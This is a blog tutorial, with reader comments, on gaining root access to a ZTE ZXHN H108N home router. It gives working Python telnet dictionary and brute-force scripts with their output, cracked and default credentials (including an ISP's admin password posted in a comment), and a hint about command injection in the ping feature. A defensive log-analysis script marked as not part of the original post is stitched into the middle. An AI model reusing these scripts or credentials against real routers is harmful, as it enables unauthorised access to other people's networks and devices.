Hacking ZTE router (ZXHN H108N)

Hello
In this tutorial I will show you how I managed to access the shell of a ZTE router. Home routers have to handle and provide services such as DHCP, DNS, filtering (firewalls) and so on, so each has to have an operating system to run these services; usually it is Linux that sits behind the scenes, operating all these services and the resources of the router (memory, networking, etc.).

I will just show you the access; I will NOT talk about how to exploit anything, to keep the scope of this tutorial narrow.

The Setup
OK, I have a ZTE router, a ZXHN H108N, that I am connected to using the wlan0 interface (wireless); the gateway is 192.168.1.1, and my goal is to gain access to the shell!

Reconnaissance and Footprinting
So the first thing to do is to scan the ports, grab the OS banner (to determine the OS) and so on. For that I used nmap:

# nmap -F 192.168.1.1 -O
Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-20 00:03 EEST
Nmap scan report for 192.168.1.1 (192.168.1.1)
Host is up (0.0035s latency).
Not shown: 97 closed ports
PORT    STATE SERVICE
23/tcp open telnet
80/tcp open http
443/tcp open https
MAC Address: 54:22:F8:16:67:1F (zte)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 – 2.6.30
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.32 seconds

I used a fast scan (the -F option) for no particular reason; I could do a full TCP scan or even include UDP, but I would like to keep things simple! So as you can see the OS is Linux 2.6.9-2.6.30 and three ports are open, and as the results show, this router is running Telnet! This should be fun (and it was!)

Gaining Access
So the next thing is to try to connect to the router via Telnet, so I did the following:

# telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
************************************************************
Welcome to the world of CLI !
************************************************************
Username:

We need the username and password to access the CLI (Command Line Interface)! I just tried a couple of random usernames (I had 3 chances before the connection is lost). The first one was “admin” and it returned “% Bad username!”, but then I thought to myself: “If I want to access the shell as root... the username should be root, right? duh!!!” So I tried root and it was correct, but for the password I tried a couple of well-known passwords such as {toor, root, admin, admin123, …} and none worked (I failed)! I could go on for hours/days/weeks... but I want to access the shell and I wanted it NOW!!!

The Attack 0x00
So, what do I have so far?

  • IP address
  • Telnet access (opened)
  • CLI
  • Username

I need the password!

Well… for no particular reason I decided to write my own tool (in Python) to crack the password using a dictionary attack. I used a very small wordlist (1275 words only), made of the most commonly used passwords; I don’t remember where I got this list from, but it is not really important, as you can use any of the wordlists available for free on the web.

#ZTE_Hacking
# execfile('/home/ligeti/Scripts/ZTE_Script.py')
import telnetlib
import time
from sys import stdout

wordlist = '/home/ligeti/wordlists/wordlist.txt'
# Load the wordlist file
with open(wordlist, 'r') as f:
    # Read the file (one candidate password per line)
    lines = f.readlines()
    # Telnet
    connection = telnetlib.Telnet()
    # Testing
    for password in lines:
        try:
            print '\r' + '\t' + time.ctime(time.time()) + '\t' + password.strip('\r\n'),
            stdout.flush()
            # Connect to the router (Telnet); a fresh connection per attempt
            connection.open('192.168.1.1')
            # Read until the server/Router asks for the username
            chk = connection.read_until("Username:")
            # Send the username (root)
            connection.write("root\n")
            # Read until the server/Router asks for the password!
            chk = connection.read_until('Password:')
            # Send the password that we are currently testing
            connection.write(password)
            # This is important: I actually don't know
            # how to check if this password is correct,
            # but I know that it will keep asking for the password in case it is not!
            # So I will check for the "Password:" string, and if I get a delay
            # (no new prompt before the timeout) then this could mean that this is the correct password!
            chk = connection.read_until('Password:', 5)
            # Extra check: make sure the router didn't respond with "% Bad username!"
            if ('Bad' not in chk):
                connection.close()
                print "\nHacked: " + password
                break
            # Wrong guess: drop the connection and move on to the next word
            connection.close()
        except Exception, e:
            print 'Error (' + password.strip('\r\n') + '): ' + str(e)

Note: the script is dirty, and I don’t care; all I want is the password! If you are irritated by my script please feel free to post a better one, but please do it quietly: the script is not the main topic of this thread, or of any of my threads... ever! I am asking this with all due respect of course.
So here is the output (it took a while to finish):

execfile('/home/ligeti/Scripts/ZTE_Script.py')
Tue Jun 24 23:17:13 2014
888888 Error (888888): telnet connection closed
Tue Jun 24 23:17:46 2014
angela1 Error (angela1): telnet connection closed
.
.
.
Tue Jun 24 23:31:46 2014
parrot Error (parrot): telnet connection closed
Tue Jun 24 23:32:10 2014
public
Hacked: public
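Seen from the router's or firewall's side, the run above is a burst of short telnet sessions from one host, one per guess, about half a minute apart. As an added example (not part of the original post), here is a Python 3 detector that reads constructed firewall-style connection log lines (the log format and the sample records are assumed for this example, not any real product's), flags a source that opens many tcp/23 sessions inside a sliding window, and lists every telnet client at all, since telnet is cleartext and should not be in use anyway.

```python
import re
from collections import defaultdict
from datetime import datetime

WINDOW = 600      # seconds: sliding window in which sessions are counted
THRESHOLD = 5     # tcp/23 sessions from one source inside WINDOW -> alert

# Assumed firewall log format (constructed for this example):
#   Mon DD HH:MM:SS host fw: NEW TCP src:sport -> dst:dport
LINE_RE = re.compile(
    r'^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) \S+ fw: NEW TCP '
    r'(?P<src>\d+\.\d+\.\d+\.\d+):\d+ -> (?P<dst>\d+\.\d+\.\d+\.\d+):(?P<dport>\d+)$')

# Constructed sample: one host reconnects every ~33 s (the dictionary script's
# pattern), another host opens a single telnet session, plus HTTP and noise.
SAMPLE_LOG = """\
Jun 24 23:17:13 gw fw: NEW TCP 192.168.1.7:51020 -> 192.168.1.1:23
Jun 24 23:17:15 gw fw: NEW TCP 192.168.1.20:40210 -> 192.168.1.1:80
Jun 24 23:17:46 gw fw: NEW TCP 192.168.1.7:51021 -> 192.168.1.1:23
Jun 24 23:18:19 gw fw: NEW TCP 192.168.1.7:51022 -> 192.168.1.1:23
Jun 24 23:18:52 gw fw: NEW TCP 192.168.1.7:51023 -> 192.168.1.1:23
Jun 24 23:19:25 gw fw: NEW TCP 192.168.1.7:51024 -> 192.168.1.1:23
Jun 24 23:19:58 gw fw: NEW TCP 192.168.1.7:51025 -> 192.168.1.1:23
Jun 24 23:30:01 gw fw: NEW TCP 192.168.1.20:40311 -> 192.168.1.1:23
this line is deliberately malformed and must be skipped
""".splitlines()


def parse_line(line, year=2014):
    """Return (timestamp, src, dst, dport) or None for lines that don't match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    # syslog timestamps carry no year; the caller supplies it
    ts = datetime.strptime('%d %s' % (year, m.group('ts')), '%Y %b %d %H:%M:%S')
    return ts, m.group('src'), m.group('dst'), int(m.group('dport'))


def detect_telnet_bruteforce(lines, window=WINDOW, threshold=THRESHOLD):
    """Return (alerts, telnet_pairs): alerts hold (src, dst, count, first_ts,
    last_ts) for each (src, dst) pair whose densest window reaches threshold;
    telnet_pairs lists every (src, dst) pair that used tcp/23 at all."""
    per_pair = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec[3] != 23:
            continue
        ts, src, dst, _ = rec
        per_pair[(src, dst)].append(ts)

    alerts = []
    for (src, dst), times in per_pair.items():
        times.sort()
        best, start = None, 0
        for end in range(len(times)):
            # shrink the window from the left until it spans <= window seconds
            while (times[end] - times[start]).total_seconds() > window:
                start += 1
            count = end - start + 1
            if count >= threshold and (best is None or count > best[0]):
                best = (count, times[start], times[end])
        if best is not None:
            alerts.append((src, dst, best[0], best[1], best[2]))
    return alerts, sorted(per_pair)


if __name__ == '__main__':
    for src, dst, n, t0, t1 in detect_telnet_bruteforce(SAMPLE_LOG)[0]:
        print('ALERT %s -> %s: %d telnet sessions from %s to %s' % (src, dst, n, t0, t1))
```

On the sample, 192.168.1.7 trips the threshold with six sessions in under three minutes, while the single session from 192.168.1.20 is only listed as a telnet client.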

Bingo! The password is “public”, time to test:

# telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
************************************************************
Welcome to the world of CLI !
************************************************************
Username:root
Password:
CLI>?
Exec commands:
enable  Turn on privileged commands.
exit    Quit from telnet.
ping    Ping the destination.
CLI>enable
Password:

Explanation:

  • I connect to 192.168.1.1:23 (telnet).
  • I enter the username and password (root/public).
  • I see the CLI> prompt (similar to Cisco routers), so I try ‘?’ for help.
  • I see the enable command, which switches the CLI to config mode.

The Attack 0x01
And now I need the password to enable the config mode. I tested some passwords manually and guessed it successfully after a few attempts, BUT… let’s try to brute-force the damn thing anyway.

The password is alphanumeric, so my charset will be:

>>> import string
>>> string.ascii_letters + string.digits
'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'

So I need code to test every combination of these characters… crazy, eh? Because the total number of tries for a three-character password alone would be:

>>> pow(len(string.ascii_letters + string.digits), 3)
238328

And for 8 characters:

>>> pow(len(string.ascii_letters + string.digits), 8)
218340105584896L

I have no time for this… so I will show you a simple script (just for fun) that checks only 3-character passwords (and only with the string.lowercase charset).

#ZTE_Enable
# execfile('/home/ligeti/Scripts/ZTE_Enable.py')
import telnetlib
import time
from sys import stdout
import itertools
import string

password = []
connection = telnetlib.Telnet()
print "Connecting to router"
connection.open('192.168.1.1')
print "Connecting to CLI"
# Log in to the CLI with the credentials found above (root/public)
chk = connection.read_until('Username:')
connection.write('root\n')
chk = connection.read_until('Password:')
connection.write('public\n')
chk = connection.read_until('CLI>')
print "Generating wordlist"
# Every 3-character lowercase combination: aaa, aab, ... zzz
wordlist = itertools.product(string.lowercase, repeat=3)
for word in wordlist:
    password.append(''.join(word))
print "Attacking..."
index = 0
while (index < len(password)):
    connection.write('enable\n')
    chk = connection.read_until('Password:')
    # Three guesses per enable prompt
    for i in range(0, 3):
        if index >= len(password):
            break
        print '\r' + str(index) + '\t' + time.ctime(time.time()) + '\t' + password[index],
        stdout.flush()
        connection.write(password[index] + '\n')
        chk = connection.read_until('Password:', 1)
        index += 1
    if ('Bad' not in chk):
        print "\nHacked: " + password[index-1]
        break

Output (it took 4+ hours to finish):

>>> execfile('/home/ligeti/Scripts/ZTE_Enable.py')
Connecting to router
Connecting to CLI
Generating wordlist
Attacking…
17398
Wed Jun 25 00:59:00 2014
Hacked: zte
zte

Yes, it was ‘zte’, something I had guessed by myself, and with this information I could actually access the config mode:

# telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.

************************************************************
Welcome to the world of CLI !
************************************************************
Username:root
Password:
CLI>?
Exec commands:
enable  Turn on privileged commands.
exit    Quit from telnet.
ping    Ping the destination.
CLI>enable
Password:
CLI#?
Exec commands:
allgreenledon   set all green led on
allledoff       set all led off
allledon        set all led on
configure       Enter configuration mode.
disable         Exit from privilege mode.
exit            Quit from telnet.
macaddr         show or set mac address
ping            Ping the destination.
reboot          Reboot device.
reset           reset device
restoredefault  Reset to factory configuration.
serialnumber    get or set SN
swversion       show software version

I don’t want to make this thread any longer; I know that the subject is boring, but… I had to share (for a very good reason).

So the username and password for the shell are root:root (tested manually).

Summary
We connected to the router (192.168.1.1) using telnet. An authentication process was in place; we managed to guess the username and cracked the password using a dictionary (with the tool I scripted in Python). Then we found out that there was more to dig into, so we enabled the configuration mode, where again we needed to log in (another authentication process); this time we brute-forced the password and gained access. Last but not least, we guessed (easily) the username and password used to access the shell as root!

Conclusion
If your router is using Telnet… get another one! If it uses SSH, check the version and the security configuration! Be very careful with these issues: a misconfigured network device can be the worst nightmare one can have if a hacker finds out about it! So always check and double-check your network configuration and the devices you use!

Thank you and please leave your comments or questions.

57 thoughts on “Hacking ZTE router (ZXHN H108N)”

  1. hello, I have this kind of modem and for me it is very difficult to use Python
    if you can make a video tutorial from the beginning, or if it is possible to create some batch files like
    step1.bat
    step2.bat
    or step1.py
    step2.pyw
    etc. to hack easily, because most of us are beginners 🙂
    thank you very much

    • Hello Tony

      I am working on a video tutorial that I will publish shortly; I will contact you (as I see you are interested) once it is online.

      Thanks,
      Ligeti

  2. I’m from Albania
    Our ISP blocks this kind of ADSL router
    they give us only a user account, not an admin account
    I’m waiting too for this video
    I follow this thread and when there is a new reply in this thread I will inform
    thanks for your work

    • Thanks, currently I am on a tight schedule, going from one project to another, but I will update you guys soon. I am doing a full analysis (PT) of the ZTE home AP (ZXHN H108N), but I will also cover common vulnerabilities found in other home APs as well.

      I think the first video will be ready next week, hopefully.

      And thanks for your comments and interest.

  3. I don’t understand this:
    let’s say everything works OK, as you say,
    you don’t have access to the OS of the computer that uses this router to connect to the net,
    but just to a part of the OS that the router uses for its settings, right?

    so what?

    • “part of the OS that the router”, no… you get access to everything, there is no such thing as (part of the OS), it’s either everything or nothing, especially when you are root!
      “So what?” well… ever thought of DNS-based attacks? What about modifying the iptables configuration (firewall)?
      What comes after getting root access is up to you… you can fix it, or break it!
      Peace.

  4. I have my own PC and my own router ZXHN-H108N
    I have only limited access on that router
    that router works, but if I want to use more features like: 1-MAC filter, 2-hide my SSID, 3-change channel from 1 to 6 or 11, 4-QoS, or other things that the router really can do..
    the only thing I need is to log in as admin, if you can force a change to the default password or something like that
    That’s ALL
    THANK YOU FOR YOUR TIME

  5. hello… I’m from Albania too, to have full setup access can we downgrade the firmware or in any way go back to factory settings? this fucking ISP Albtelecom Albania….. can’t do anything with this modem…. and what about the USB port??

    • Does restoring to factory default solve that problem? I am not sure how I can help you here as I don’t have many details; I would think that they (the ISP) installed a customized firmware, in that case you should hack your way into the system (using my tutorial or web-based attacks, hint: ping functionality is usually vulnerable to RCE), then you can change the configuration of the router. This is not an easy task for beginners (I am not saying that you are one), and I believe that it will take you a couple of days to figure it out (it took me a few hours to hack it)

      • Thanks for your answer. I think you are right, the ISP has installed a customized firmware and no one, including the staff of the Albtelecom ISP, knows an admin or full-access setup for this router, @@@@…. I’m thinking of installing a firmware from a site I found somewhere….. if it doesn’t work I don’t have much time for this router…. that hacking method that you mention I don’t know. Thanks again for your time man.

      • For the Albanian users: Telnet port is open and the credentials are default:
        Username: root
        Password: root

        login as administrator via http:
        Username: admin
        Password: albtelecom12345678

        Good Luck

  6. I am trying to use an internet USB dongle to access the internet via the same router but I can’t get through (the router and dongle come from the same ISP)
    would you please help

  7. Hello ligeti.
    I was googling about this model and came across this site.
    Like most users here I am from Albania too and have a modem of this model.
    I tried to telnet to it and to my surprise the user root and password root worked, and the telnet session gives a prompt like this:
    BusyBox v1.01 etc

    The thing is I am familiar with the Cisco CLI but can’t figure out how to use this interface.
    Anyway this modem, as you know, has an HTTP interface that asks for authentication, and the user login doesn’t give you many privileges; you can only change the ISP dial-up settings and your wireless security settings. The question is, can we find a way to unlock the HTTP username for the admin account so we can configure settings on our modem via the web page?

    If you can tell me where to start searching for a solution at least, I would appreciate it.
    Thanks.

  8. hello my friend and thank you for that lovely writeup.
    I too have a H108N, and when I try to connect to telnet the connection times out.
    the nmap scan reports port 23 as “filtered”
    any ideas how to overcome that?

    • Yes, we believe that there is another vulnerability (at least one) that can open the Telnet port by altering the iptables rules, but I can’t confirm it now as we are planning to test it this weekend; after that I will make a video and show you how to do a full security assessment of the ZXHN H108N and other APs/routers.

      So, I will come back to you on this in a couple of days.

      Thanks

  9. I only need to enable telnet so I can add a static ARP client (wake on LAN). How can I do this? Note, I have the root password. Thank you.

    • Hello…
      Did you find a way to do this?
      I am from Greece and I have the same router and I need to enable WOL…
      Thank you in advance…
      Best regards…

  10. I tried the scripts with Python 3, then I figured out that it was Python 2 (that kind of Python noob I am)
    but I continue having problems executing the scripts, master,
    for example, I get this kind of error message (using my own word list)

    Traceback (most recent call last):
      File "<pyshell#6>", line 1, in <module>
        execfile ('C:\Users\Mr-Bledi\Downloads\Zte_script.py')
      File "C:\Users\Mr-Bledi\Downloads\Zte_script.py", line 21
        chk = connection.read_until(quot;Username:&quot;)
                                        ^
    SyntaxError: invalid syntax
    

    but hey, you know how they say, curiosity killed the cat!
    please, I hope you respond fast because I won’t be here after New Year’s Eve!
    as I said, just curious!

    CHEERS!

      • Hi Ligeti.. I have a ZTE MF283+ router for LTE provided by my network here in the Philippines, which is Globe. I am located just around 1.5 km from the cell site but with much vegetation, I cannot get good reception and there is no service. I was trying my mobile and some portion of my home has a 3G signal, but I wonder why the router cannot get the 3G signal if the LTE is weak. I checked the specifications of the router and it is capable of receiving LTE, 3G and 2G signals. Possibly, I think the network set or locked the router to LTE-only reception. I checked the router setup and cannot find any setting option to change the reception to LTE or 3G. Is there a way I can access and unlock the router and change the network or band setting to Auto (LTE or 3G), whichever is available or has stronger signal reception? Can you please help with this, thank you.
        rentangz

    • Hi kamakha,
      I’m trying to use a Billion 7800N router behind the ZTE F660 but I can’t get it to work. I read in some forum that I should configure the F660 as a bridge. If so, how could that be done? Any help will be appreciated

  11. Hi guys,
    I have been trying to delete some rules from iptables, but can’t save the configuration that has been made.
    I have tried iptables-save and service iptables save, but all failed.

    The router is a ZTE ZXHN F660 v5.

    Is there any other method to change the router’s iptables/network rules?

  12. Hi there, I have this router and it is bricked (“no access to the web page”). Any hints or help to unbrick it? I just need a default recovery. The traditional reset button method does not work. I appreciate your help.

  13. Hi Ligeti,
    Greetings from Jakarta.
    I am Dafi from Indonesia, interested in this article; it is a nice article even though I’m not a linuxholic.. haha.
    I need your assistance: could you please share with me another tutorial on how to block porn or adult content through this device? Because I have 2 children and I don’t want either of them to be able to access it.

    thank you in advance,

    • There are many tutorials available online about this subject, I am on the offensive side of security (VA/PT), so this topic won’t fit my blog, my apologies.

  14. Hi Ligeti,

    Thanks for the interesting article. I was wondering if you might be able to assist in flashing this device to use OpenWRT? Current firmware version is: ZXHN H108NV4.0.1a_ZRQ_ID_D67

    The device is a Telkom Indonesia branded one. I was hoping to use the firmware from https://wiki.openwrt.org/toh/zte/zxhnh108n. What I’ve tried so far:

    1. Download and rename firmware to “ras”.
    2. Boot the device, telnet to it, login and run “sys modelcheck off”.
    3. From the firmware section in the maintenance gui I then add the “ras” file in the firmware section and press the upgrade button.
    4. The firmware seems to be uploaded to the device but I always get an “Error:FAIL TO UPDATE DUE TO…The upload file was not accepted by the router.”.

    Any ideas? Thanks in advance!

    • I didn’t explore the firmware yet, but soon I will publish some videos that cover all this; all I can recommend is to refer to the OpenWrt community to check this error.

  15. ZTE ZXHN H108NS here. The only open ports are 21 FTP, 53 DNS, 80 HTTP, and 5555 UPnP. NO TELNET access. Trying to flash OpenWRT Chaos Calmer onto the device but failed while attempting to do it through the web interface (the device will not allow the firmware to upload).

    • My recommendation is to hunt for a command injection vulnerability and search for anything that might look interesting in the current firmware; it’s not an easy task though, and needs dedication (like all other hacking projects).

  16. Is it okay if I use Windows? I’m afraid this job might be illegal in my country.
    my laptop already has Windows installed (7 btw) from my school.

    • It is not OK to hack someone’s AP (even if you mean no harm); you should have written approval to do so.
      And yes, you can use any OS (Windows, Linux, Android, iOS… and so on)…
      Peace

  17. Hello,
    I have a ZTE H218, and I can access it via telnet with the user and password that you give. The problem is that with these credentials I don’t have all permissions, because I only see a few things about the configuration, and for example I don’t see the routing table. Do you already have a video on how to execute these Python scripts and where? Because I want to know if another user/password with more privileges exists.

    thanks

  18. Really interesting article, I enjoyed every second reading it. Well done!
    I have the same router and I gave it a try, but it looks like the ISP has a customized firmware that automatically enters the username ‘admin’ when you try ‘telnet 192.168.1.1’ and you are left only to enter the password for that username, which is also ‘admin’. The commands available when I entered “?” are almost useless, no “enable” here.
    I don’t know where to get the stock firmware, any idea?

  19. Everything works for me except the shell login. Username root and FNNSD3zxhnh168nv31 don’t work. HW version 2.1 SW version 2.1.0T4.
